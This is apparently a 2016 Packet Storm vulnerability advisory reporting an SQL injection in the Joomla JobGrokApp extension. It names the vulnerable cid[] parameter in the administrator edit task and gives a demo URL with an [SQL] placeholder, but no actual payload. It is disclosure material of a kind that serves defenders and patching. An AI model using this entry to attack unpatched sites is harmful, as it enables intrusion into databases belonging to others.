Joomla JobGrokApp 3.1-1.2.55 SQL Injection

2016-06-07T00:00:00
ID PACKETSTORM:137339
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2016-06-07T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla com_jobgrokapp - SQL Injection  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://extensions.joomla.org/extension/job-grok-app  
# Software Link: http://www.uplooder.net/f/tl/42/ae553152683fc9d97a555210d7028a8c/com-jobgrokapp-V3.1-1.2.55.zip  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 3.1-1.2.55  
# Date: 2016/06/07  
######################  
#   
# PoC:  
# Login with Admin User And Edit one Applications cid[] Parameter Vulnerable to SQL Injection  
# Demo :  
# http://localhost/joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit&cid[]=[SQL]  
# Image: http://www.uplooder.net/img/image/30/de1049a0eb485c78590332d185ee7189/com-jobgrokapp.png  
#  
######################  
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)  
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members  
# Homepage : persian-team.ir  
######################   
`